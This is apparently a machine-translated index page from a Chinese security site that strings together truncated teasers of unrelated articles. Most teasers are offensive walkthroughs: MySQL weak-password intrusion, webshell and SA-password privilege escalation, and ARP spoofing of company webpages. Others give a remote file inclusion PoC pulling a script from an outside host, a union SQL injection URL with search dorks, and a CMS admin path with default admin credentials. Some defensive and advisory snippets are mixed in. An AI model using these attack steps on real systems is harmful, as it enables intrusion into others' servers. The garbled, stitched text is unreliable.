Cloud Security

The origin of Fuzzing Just as Watt invented the steam machine to free us from human hands and increase productivity, some or an outstanding hacker invented the Fuzzing technology when studying vulnerability mining technology. It can be said that

As the number of vrouters increases, the security of vrouters has gradually become a hot topic for discussion. Today, Alibaba Cloud also talks about the security configurations of vrouters in network security. the following articles are my study

Defense scheme of Arp Firewall: 1. Bind the Mac address and IP address of the Gateway in the local Arp cache table (using the "arp-a" command, you can see that the gateway Mac address and IP address status are static ). Role: prevent other machines

The following uses the LAMP architecture as an example to describe the first step: Use the SQL scan tool to obtain a host with a weak password that opens port 3306 (the default port number of SQL server is 1433) on the Intranet.Step 2: remotely log

Some time ago, the user information of major websites was leaked. Some websites still use plain text for account transmission. I have been thinking about why there are such a large vulnerability in information security in China. In fact, the most

CiscoRouter configurationIPSCEDynamic Encryption Lab environment:Company A Headquarters router A and branch router B VPN communication, using three-layer IPSEC-VPN, due to the branch using DLINK VPN equipment, cannot set IP, Headquarters decided to

Today, my friend lost a webshell and asked me to raise his right. After getting the password, my friend said that the drive D can be viewed. after entering the drive D, I can see many sensitive directories; 1. I personally have a habit. Every time I

  After obtaining the SA password, the Server Manager or? Predecessors? Restrict the use of net.exeand net1.exe, and you cannot add an administrator account. We know that VBS has a winnt object in the Active Directory (ADSI) to manage local

Because the function is not initialized, the function can include any file;1, register_global = On2, allow_url_fopen = OnThen you can include Poc: www. r0expeR. Net/index. php? Pathdir = http://www.r0expeR.Net/xx.txt $ Poc = $ _ GET [pathdir];Echo

ARPSpoof spoofs company webpages to be hacked ipconfig /all  Ping website URL Arpspoof.exe/n   (Click to view the big picture) Figure 8-39 to obtain the IP address of the gateway Server  

Now, after logging on to the target 3389, I am optimistic that many people are used to grasping the password HASH and then returning to the rainbow table to crack the plaintext, or passing a winloginhack to record the 3389 login password. In my

From ShaunS BlogFooeeshop injection vulnerability occurs in the search area. There are 2 places.1. Gift_Search_List.Asp Dim strGift_Key: strGift_Key = Request. QueryString ("Gift_Key") The Gift_Key is not checked hereDim intGift_Point_From:

From sentiment s blog Baidu or google "technical support: luoxin network" Background address: site + lx Database address: site + lx + databases + primary domain name. asp (you need to guess) Account & password: admin Shell is used. Important:

Test method:The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! /*04-06-2010 PHP 6.0 Dev str_transliterate () 0Day Buffer Overflow ExploitTested on Windows 2008 SP1

Keywords: Inurl: Search. Asp? Range = Product & Keyword =Inurl: ProductBuy. Asp? ProductNo =Inurl: (ProductShow. asp? ID =) Explosive User: Http: // 127.0.0.1/hitcount. asp? Lx = LiangJingCMS_DownSort & id = 1% 20and % 201 = 2% 20 union % 20

From magic spring blog Vmsplice system calling was introduced for the first time in Linux kernel 2.6.17. Subsequently, it was found that there was a vulnerability that allowed common users to escalate to root permissions. The versions affected by

My friend gave me a website that showed me its security. I opened the URL and looked at it roughly. It is estimated that it is 2000 of the system (why? See asp ). Then scan it with a X-SCAN, a vulnerability does not (including WEBDAVX and DRPC) is

Black boy from F rom Error code: Dim upload, file, formName, formPath, iCount, fileformatSet upload = new upload_F Function MakedownName () Dim fname   Fname = now () Fname = replace (fname ,"-","")   Fname = replace (fname ,"","") Fname = replace

Test method:The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! OpenSSL Security Advisory [01-Jun-2010] Two security flaws have been fixed in OpenSSL 0.9.8o and